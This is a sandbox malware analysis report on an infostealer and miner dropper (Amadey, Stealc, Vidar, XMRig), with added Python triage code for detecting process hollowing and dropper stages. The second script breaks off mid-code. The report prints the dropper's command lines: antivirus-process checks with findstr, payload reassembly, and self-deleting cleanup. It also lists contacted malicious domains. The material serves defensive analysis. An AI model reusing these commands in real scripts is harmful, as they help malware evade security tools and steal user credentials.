Malware Analysis Report

2024-09-11 16:06

Sample ID 240614-psz1zs1cjb
Target Setup (10).zip
SHA256 da776507672afdca20f7322294fc110216daa2e35e453ea45a19599e34788399
Tags
amadey stealc vidar ffb1b9 discovery spyware stealer trojan xmrig execution miner upx
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK Matrix
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral3
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

score
10/10

SHA256

da776507672afdca20f7322294fc110216daa2e35e453ea45a19599e34788399

Threat Level: Known bad

The file Setup (10).zip was found to be: Known bad.

Malicious Activity Summary

Vidar

Suspicious use of NtCreateUserProcessOtherParentProcess

Stealc

xmrig

Detect Vidar Stealer

Amadey

XMRig Miner payload

Downloads MZ/PE file

Blocklisted process makes network request

Checks computer location settings

Reads data files stored by FTP clients

Reads user/profile data of local email clients

UPX packed file

Loads dropped DLL

Executes dropped EXE

Reads user/profile data of web browsers

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Suspicious use of SetThreadContext

Drops file in Windows directory

Command and Scripting Interpreter: PowerShell

Enumerates physical storage devices

Unsigned PE

Enumerates processes with tasklist

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Suspicious behavior: MapViewOfSection

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-14 12:36

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-14 12:36

Reported

2024-06-14 12:40

Platform

win7-20240221-en

Max time kernel

146s

Max time network

138s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Stealc

stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 336 created 1196 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Windows\Explorer.EXE

Vidar

stealer vidar

Downloads MZ/PE file

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 336 set thread context of 2260 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 2436 set thread context of 2308 N/A C:\ProgramData\CGDBFBGIDH.exe C:\Windows\SysWOW64\ftp.exe
PID 2524 set thread context of 2464 N/A C:\ProgramData\BFCFBKKKFH.exe C:\Windows\SysWOW64\ftp.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Watcher Com SH.job C:\Windows\SysWOW64\ftp.exe N/A
File created C:\Windows\Tasks\TWI Cloud Host.job C:\Windows\SysWOW64\ftp.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [binary certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\ProgramData\CGDBFBGIDH.exe N/A
N/A N/A C:\ProgramData\BFCFBKKKFH.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3016 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\Setup (10).exe C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 2820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2572 wrote to memory of 2828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2572 wrote to memory of 2400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2572 wrote to memory of 2168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2572 wrote to memory of 2764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 1240 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2572 wrote to memory of 1944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 336 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 2572 wrote to memory of 592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 336 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 2260 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\ProgramData\BFCFBKKKFH.exe
PID 2260 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\ProgramData\CGDBFBGIDH.exe
PID 2436 wrote to memory of 2308 N/A C:\ProgramData\CGDBFBGIDH.exe C:\Windows\SysWOW64\ftp.exe
PID 2524 wrote to memory of 2464 N/A C:\ProgramData\BFCFBKKKFH.exe C:\Windows\SysWOW64\ftp.exe
PID 2260 wrote to memory of 704 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Windows\SysWOW64\cmd.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Setup (10).exe

"C:\Users\Admin\AppData\Local\Temp\Setup (10).exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Secretariat Secretariat.cmd & Secretariat.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 150746

C:\Windows\SysWOW64\findstr.exe

findstr /V "reachedindicatingfindlawfu" Cologne

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Abroad 150746\e

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

150746\Mind.pif 150746\e

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

C:\ProgramData\BFCFBKKKFH.exe

"C:\ProgramData\BFCFBKKKFH.exe"

C:\ProgramData\CGDBFBGIDH.exe

"C:\ProgramData\CGDBFBGIDH.exe"

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FIIJJKKFHIEH" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 WAmbXuXSzuXabiImZi.WAmbXuXSzuXabiImZi udp
US 8.8.8.8:53 theemir.xyz udp
US 104.21.81.243:443 theemir.xyz tcp
US 8.8.8.8:53 c.pki.goog udp
GB 172.217.169.67:80 c.pki.goog tcp
US 8.8.8.8:53 businessdownloads.ltd udp
US 172.67.212.123:443 businessdownloads.ltd tcp
US 8.8.8.8:53 i.imgur.com udp
US 199.232.196.193:443 i.imgur.com tcp
US 8.8.8.8:53 proresupdate.com udp
US 45.152.112.146:80 proresupdate.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Secretariat
C:\Users\Admin\AppData\Local\Temp\Cologne
C:\Users\Admin\AppData\Local\Temp\Estates
C:\Users\Admin\AppData\Local\Temp\Reasons
C:\Users\Admin\AppData\Local\Temp\Race
C:\Users\Admin\AppData\Local\Temp\Changed
C:\Users\Admin\AppData\Local\Temp\Lake
C:\Users\Admin\AppData\Local\Temp\Fx
C:\Users\Admin\AppData\Local\Temp\Then
C:\Users\Admin\AppData\Local\Temp\Timeline
C:\Users\Admin\AppData\Local\Temp\Destiny
C:\Users\Admin\AppData\Local\Temp\Vintage
C:\Users\Admin\AppData\Local\Temp\Overnight
C:\Users\Admin\AppData\Local\Temp\Fighting
C:\Users\Admin\AppData\Local\Temp\Travelling
C:\Users\Admin\AppData\Local\Temp\Flyer
C:\Users\Admin\AppData\Local\Temp\Lol
C:\Users\Admin\AppData\Local\Temp\Fails
C:\Users\Admin\AppData\Local\Temp\Impacts
C:\Users\Admin\AppData\Local\Temp\Worry
C:\Users\Admin\AppData\Local\Temp\Therefore
C:\Users\Admin\AppData\Local\Temp\Ensures
C:\Users\Admin\AppData\Local\Temp\Venezuela
C:\Users\Admin\AppData\Local\Temp\Noticed
C:\Users\Admin\AppData\Local\Temp\Controversial
C:\Users\Admin\AppData\Local\Temp\Expects
C:\Users\Admin\AppData\Local\Temp\Banners
C:\Users\Admin\AppData\Local\Temp\Tactics
C:\Users\Admin\AppData\Local\Temp\Exception
C:\Users\Admin\AppData\Local\Temp\Voice
C:\Users\Admin\AppData\Local\Temp\Abroad
\Users\Admin\AppData\Local\Temp\150746\Mind.pif
\ProgramData\FIIJJKKFHIEH\nss3.dll
\ProgramData\FIIJJKKFHIEH\mozglue.dll
C:\ProgramData\BFCFBKKKFH.exe
C:\ProgramData\CGDBFBGIDH.exe
C:\Users\Admin\AppData\Local\Temp\2ff0e402
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\Local\Temp\Cab25F8.tmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\Local\Temp\Tar27F2.tmp
C:\Users\Admin\AppData\Local\Temp\3cf5cb4b
C:\Users\Admin\AppData\Local\Temp\34f40353
C:\Users\Admin\AppData\Local\Temp\40c7ec8c
C:\ProgramData\FIIJJKKFHIEH\msvcp140.dll
C:\ProgramData\FIIJJKKFHIEH\softokn3.dll
C:\ProgramData\FIIJJKKFHIEH\VCRUNT~1.DLL

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-14 12:36

Reported

2024-06-14 12:40

Platform

win10v2004-20240508-en

Max time kernel

67s

Max time network

68s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1032 created 3368 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Windows\Explorer.EXE
PID 1032 created 3368 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Windows\Explorer.EXE

Vidar

stealer vidar

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Setup (10).exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A

Reads data files stored by FTP clients

spyware stealer

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1032 set thread context of 2632 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4760 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Local\Temp\Setup (10).exe C:\Windows\SysWOW64\cmd.exe
PID 4760 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Local\Temp\Setup (10).exe C:\Windows\SysWOW64\cmd.exe
PID 4760 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Local\Temp\Setup (10).exe C:\Windows\SysWOW64\cmd.exe
PID 3400 wrote to memory of 2520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3400 wrote to memory of 2520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3400 wrote to memory of 2520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3400 wrote to memory of 3248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3400 wrote to memory of 3248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3400 wrote to memory of 3248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3400 wrote to memory of 4220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3400 wrote to memory of 4220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3400 wrote to memory of 4220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3400 wrote to memory of 2516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3400 wrote to memory of 2516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3400 wrote to memory of 2516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3400 wrote to memory of 1132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3400 wrote to memory of 1132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3400 wrote to memory of 1132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3400 wrote to memory of 1096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3400 wrote to memory of 1096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3400 wrote to memory of 1096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3400 wrote to memory of 2384 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3400 wrote to memory of 2384 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3400 wrote to memory of 2384 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3400 wrote to memory of 1032 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 3400 wrote to memory of 1032 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 3400 wrote to memory of 1032 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 3400 wrote to memory of 1760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3400 wrote to memory of 1760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3400 wrote to memory of 1760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1032 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 1032 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 1032 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 1032 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 1032 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 1032 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 1032 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 1032 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 2632 wrote to memory of 4280 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 4280 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 4280 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Windows\SysWOW64\cmd.exe
PID 4280 wrote to memory of 808 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4280 wrote to memory of 808 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4280 wrote to memory of 808 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
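
Most rows in the table above are ordinary: a parent writes into a child it has just created (startup information, environment block) and the sandbox records that as WriteProcessMemory. The rows that matter are the ones where Mind.pif (PID 1032) writes into a second copy of its own image (PID 2632) and, per the "Suspicious use of SetThreadContext" signature above, also resets that child's thread context. Spawn a copy of yourself, overwrite it, redirect its thread: that is process hollowing, and the memory dumps listed for PID 2632 further down are taken from that hollowed copy. The following is an added example, not code from the sandbox or the report: it parses rows in the exact format the signature tables use, rebuilds the process tree from the write edges and classifies each edge. The edge list and row counts are transcribed from the behavioral2 table. The caveat it makes visible is worth keeping in mind when writing a rule: without the SetThreadContext correlation, cmd.exe writing into a child cmd.exe (PIDs 1132 and 2384) and the first Mind.pif child (2860) look exactly like the hollowed one, so same-image writes alone are too noisy to alert on.

```python
"""Injection-graph triage over sandbox "wrote to memory of" rows.

Added example, not part of the report: parses rows in the format the
signature tables use, rebuilds the process tree and separates ordinary
parent-to-child writes from the same-image write + SetThreadContext pair
that indicates process hollowing.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

WRITE_RE = re.compile(
    r"^PID (\d+) wrote to memory of (\d+) N/A ([A-Za-z]:\\.*?) ([A-Za-z]:\\.*)$")
CTX_RE = re.compile(
    r"^PID (\d+) set thread context of (\d+) N/A ([A-Za-z]:\\.*?) ([A-Za-z]:\\.*)$")

TEMP = r"C:\Users\Admin\AppData\Local\Temp"
SETUP, MIND = TEMP + r"\Setup (10).exe", TEMP + r"\150746\Mind.pif"
SYS = r"C:\Windows\SysWOW64"
CMD, TASKLIST = SYS + r"\cmd.exe", SYS + r"\tasklist.exe"
FINDSTR, TIMEOUT = SYS + r"\findstr.exe", SYS + r"\timeout.exe"

# (writer PID, target PID, writer image, target image, row count), transcribed
# from the behavioral2 WriteProcessMemory table above.
EDGES = [
    (4760, 3400, SETUP, CMD, 3), (3400, 2520, CMD, TASKLIST, 3),
    (3400, 3248, CMD, FINDSTR, 3), (3400, 4220, CMD, TASKLIST, 3),
    (3400, 2516, CMD, FINDSTR, 3), (3400, 1132, CMD, CMD, 3),
    (3400, 1096, CMD, FINDSTR, 3), (3400, 2384, CMD, CMD, 3),
    (3400, 1032, CMD, MIND, 3), (3400, 1760, CMD, TIMEOUT, 3),
    (1032, 2860, MIND, MIND, 3), (1032, 2632, MIND, MIND, 5),
    (2632, 4280, MIND, CMD, 3), (4280, 808, CMD, TIMEOUT, 3),
]
# Expanded back into literal row text so the parser sees the report's own format.
SAMPLE_ROWS = [f"PID {s} wrote to memory of {d} N/A {si} {di}"
               for s, d, si, di, n in EDGES for _ in range(n)]
SAMPLE_ROWS.append(f"PID 1032 set thread context of 2632 N/A {MIND} {MIND}")


@dataclass(frozen=True)
class Finding:
    kind: str      # "process-hollowing" | "self-image-write" | "child-setup"
    writer: int
    target: int
    image: str     # target image basename, lower-cased
    writes: int    # number of WriteProcessMemory rows on this edge


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def parse_rows(rows: List[str]):
    """Return (write counts per edge, pid -> image, set of SetThreadContext edges)."""
    writes: Dict[Tuple[int, int], int] = defaultdict(int)
    images: Dict[int, str] = {}
    ctx: Set[Tuple[int, int]] = set()
    for row in rows:
        m = WRITE_RE.match(row) or CTX_RE.match(row)
        if not m:
            continue                      # N/A rows and unrelated signatures
        s, d = int(m[1]), int(m[2])
        images.setdefault(s, m[3])
        images.setdefault(d, m[4])
        if "wrote to memory" in row:
            writes[(s, d)] += 1
        else:
            ctx.add((s, d))
    return dict(writes), images, ctx


def classify(rows: List[str]) -> List[Finding]:
    writes, images, ctx = parse_rows(rows)
    out = []
    for (s, d), n in writes.items():      # insertion order == report order
        same_image = _basename(images[s]) == _basename(images[d])
        if same_image and (s, d) in ctx:
            kind = "process-hollowing"    # own image spawned, overwritten, thread redirected
        elif same_image:
            kind = "self-image-write"     # ambiguous alone: cmd -> cmd does this too
        else:
            kind = "child-setup"          # normal CreateProcess housekeeping
        out.append(Finding(kind, s, d, _basename(images[d]), n))
    return out


def render_tree(rows: List[str]) -> str:
    """Indented parent/child tree derived from the write edges."""
    writes, images, _ = parse_rows(rows)
    children: Dict[int, List[int]] = defaultdict(list)
    for s, d in writes:
        children[s].append(d)
    roots = [p for p in images if all(p != d for _, d in writes)]
    lines: List[str] = []

    def walk(pid: int, depth: int) -> None:
        lines.append("  " * depth + f"{pid} {_basename(images[pid])}")
        for c in children[pid]:
            walk(c, depth + 1)

    for r in roots:
        walk(r, 0)
    return "\n".join(lines)


if __name__ == "__main__":
    print(render_tree(SAMPLE_ROWS))
    for f in classify(SAMPLE_ROWS):
        if f.kind != "child-setup":
            print(f"{f.kind:18} {f.writer} -> {f.target} ({f.image}, {f.writes} writes)")
```

Run against the transcribed rows it reports exactly one process-hollowing edge (1032 to 2632, five writes) and three self-image writes, two of which are the benign cmd.exe children; pasting a different report's WriteProcessMemory and SetThreadContext rows into SAMPLE_ROWS is all that is needed to reuse it.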

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Setup (10).exe

"C:\Users\Admin\AppData\Local\Temp\Setup (10).exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Secretariat Secretariat.cmd & Secretariat.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 150746

C:\Windows\SysWOW64\findstr.exe

findstr /V "reachedindicatingfindlawfu" Cologne

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Abroad 150746\e

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

150746\Mind.pif 150746\e

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif" & rd /s /q "C:\ProgramData\ECGDHDHJEBGH" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10
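
Read in order, the command lines above are the whole dropper chain, and they are more useful as stages than as isolated processes: an extensionless dropped file (Secretariat) is copied to a .cmd and run in the same shell; tasklist output is checked with findstr /I against security-product process names (Webroot's wrsa.exe, Avast's avastui.exe, AVG's avgui.exe and Sophos's sophoshealth.exe among them), and the report shows tasklist and findstr as separate children because cmd.exe spawns both ends of the pipe; a numeric staging folder is created; findstr /V emits every line of Cologne that does not carry the junk marker, which is how decoy lines are stripped from an embedded payload; copy /b reassembles Abroad into 150746\e; Mind.pif, a PE with a .pif extension that Windows runs as an executable, is launched with that file as its argument; and after the injection a final cmd.exe waits 10 seconds, deletes Mind.pif and removes C:\ProgramData\ECGDHDHJEBGH. The redirections are handled by cmd.exe itself, so they never appear in the children's command lines, and the report does not say which step wrote Mind.pif to disk. The following is an added example, not code from the report; the stage names are this example's own reading of the commands, and the command lines are copied from the list above.

```python
"""Stage detection over the command lines of the dropper chain above.

Added example, not part of the report: the rules and stage names are this
example's own reading of the commands. cmd.exe handles the redirections, so
they are not visible in the child command lines the sandbox records.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Command lines copied from the behavioral2 "Processes" list above, in order.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\cmd.exe" /k copy Secretariat Secretariat.cmd & Secretariat.cmd & exit',
    r"tasklist",
    r'findstr /I "wrsa.exe opssvc.exe"',
    r"tasklist",
    r'findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"',
    r"cmd /c md 150746",
    r'findstr /V "reachedindicatingfindlawfu" Cologne',
    r"cmd /c copy /b Abroad 150746\e",
    r"150746\Mind.pif 150746\e",
    r"timeout 5",
    r'"C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q '
    r'"C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif" & rd /s /q '
    r'"C:\ProgramData\ECGDHDHJEBGH" & exit',
    r"timeout /t 10",
]


@dataclass
class Stage:
    name: str
    cmdline: str
    indicators: Dict[str, str] = field(default_factory=dict)


# First matching rule wins, so the more specific patterns come first.
RULES = [
    # extensionless dropped file copied to .cmd and executed in the same shell
    ("renamed-batch-launch",
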